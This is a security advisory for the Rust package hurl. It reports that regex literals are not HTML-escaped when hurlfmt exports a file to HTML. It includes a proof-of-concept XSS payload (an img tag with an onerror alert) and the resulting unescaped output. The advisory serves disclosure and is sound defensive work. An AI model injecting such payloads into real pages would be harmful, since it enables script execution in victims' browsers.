GHSA-v33j-v3x4-42qg – hurl

Package

Manager: cargo
Name: hurl
Vulnerable Version: >=0 <7.0.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N/E:U/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N

EPSS: N/A pctlN/A

Details

Regex literal in Hurl files are not escaped when exported to HTML, allowing injections Given this Hurl file: regex.hurl: ``` GET https://foo.com HTTP 200 [Asserts] jsonpath "$.body" matches /<img src="" onerror="alert('Hi!')">/ ``` When exported to HTML: ``` $ hurlfmt --out html regex.hurl <pre><code class="language-hurl"><span class="hurl-entry"><span class="request"><span class="line"><span class="method">GET</span> <span class="url">https://foo.com</span></span> </span><span class="response"><span class="line"><span class="version">HTTP</span> <span class="number">200</span></span> <span class="line"><span class="section-header">[Asserts]</span></span> <span class="line"><span class="query-type">jsonpath</span> <span class="string">"$.body"</span> <span class="predicate-type">matches</span> <span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span> </span></span><span class="line"></span> </code></pre> ``` The regex literal `/<img src="" onerror="alert('Hi!')">/` is not escaped: `<span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>` When opened in a browser, the code is run without user interaction: 

Metadata

Created: 2025-06-11T14:46:37Z
Modified: 2025-06-11T14:46:37Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v33j-v3x4-42qg/GHSA-v33j-v3x4-42qg.json
CWE IDs: []
Alternative ID: N/A
Finding: F008
Auto approve: 1